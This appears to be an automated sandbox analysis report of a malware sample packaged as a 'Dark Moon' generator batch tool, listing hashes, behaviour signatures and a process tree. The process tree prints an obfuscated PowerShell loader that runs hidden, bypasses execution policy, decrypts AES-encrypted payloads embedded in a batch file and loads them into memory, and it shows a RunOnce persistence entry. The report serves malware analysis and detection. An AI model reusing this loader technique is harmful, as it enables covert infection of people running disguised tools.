Analysis
-
max time kernel
118s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-06-2024 15:43
Static task
static1
Behavioral task
behavioral1
Sample
DarkMoon_Gen_1-3.zip
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
DarkMoon_Gen_1-3.zip
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
DarkMoon_Gen_1-3/lib/main.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win7-20240220-en
Behavioral task
behavioral5
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral6
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win10v2004-20240226-en
General
-
Target
DarkMoon_Gen_1-3/starter.bat
-
Size
51B
-
MD5
abc778ba27885c72f364ad89b1306862
-
SHA1
2d4bfe8e2de4390109e8fa786ad47ec68daeaffe
-
SHA256
97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039
-
SHA512
65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
uni.bat.exepid process 1656 uni.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1888 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
main.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" main.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 13 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 2568 timeout.exe 1488 timeout.exe 580 timeout.exe 2028 timeout.exe 1644 timeout.exe 2420 timeout.exe 2844 timeout.exe 2180 timeout.exe 1636 timeout.exe 3012 timeout.exe 2812 timeout.exe 2924 timeout.exe 1692 timeout.exe -
Runs ping.exe 1 TTPs 17 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 2492 PING.EXE 2428 PING.EXE 2204 PING.EXE 1772 PING.EXE 2636 PING.EXE 2516 PING.EXE 2456 PING.EXE 2356 PING.EXE 328 PING.EXE 2224 PING.EXE 3028 PING.EXE 2676 PING.EXE 2532 PING.EXE 2520 PING.EXE 692 PING.EXE 2760 PING.EXE 2576 PING.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
uni.bat.exepid process 1656 uni.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
uni.bat.exedescription pid process Token: SeDebugPrivilege 1656 uni.bat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exemain.execmd.execmd.exedescription pid process target process PID 2240 wrote to memory of 1888 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 1888 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 1888 2240 cmd.exe cmd.exe PID 2240 wrote to memory of 1756 2240 cmd.exe main.exe PID 2240 wrote to memory of 1756 2240 cmd.exe main.exe PID 2240 wrote to memory of 1756 2240 cmd.exe main.exe PID 1756 wrote to memory of 2252 1756 main.exe cmd.exe PID 1756 wrote to memory of 2252 1756 main.exe cmd.exe PID 1756 wrote to memory of 2252 1756 main.exe cmd.exe PID 2252 wrote to memory of 2916 2252 cmd.exe chcp.com PID 2252 wrote to memory of 2916 2252 cmd.exe chcp.com PID 2252 wrote to memory of 2916 2252 cmd.exe chcp.com PID 2252 wrote to memory of 2924 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2924 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2924 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2636 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2636 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2636 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2676 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2676 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2676 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2760 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2760 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2760 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2532 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2532 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2532 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2516 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2516 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2516 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2456 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2456 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2456 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2492 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2492 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2492 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2520 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2520 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2520 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2356 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2356 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2356 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2420 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2420 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2420 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2428 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2428 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2428 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2844 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2844 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2844 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2204 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2204 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2204 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 2028 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2028 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 2028 2252 cmd.exe timeout.exe PID 2252 wrote to memory of 328 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 328 2252 cmd.exe PING.EXE PID 2252 wrote to memory of 328 2252 cmd.exe PING.EXE PID 1888 wrote to memory of 1656 1888 cmd.exe uni.bat.exe PID 1888 wrote to memory of 1656 1888 cmd.exe uni.bat.exe PID 1888 wrote to memory of 1656 1888 cmd.exe uni.bat.exe PID 2252 wrote to memory of 2568 2252 cmd.exe timeout.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K uni.bat2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exemain.exe2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "Dark Moon gen.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 14⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping discord.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.paysafecard.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.amazon.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping play.google.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping store.steampowered.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping netflix.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.spotify.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.xbox.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 04⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.google.com4⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 24⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.batFilesize
35KB
MD5c153581143e0b72cecae38a393991a4b
SHA1da43d03b19765594ff124415a060551343823a39
SHA2562fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
SHA5128c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
-
memory/1656-8-0x000000001B1A0000-0x000000001B482000-memory.dmpFilesize
2.9MB
-
memory/1656-9-0x0000000001D40000-0x0000000001D48000-memory.dmpFilesize
32KB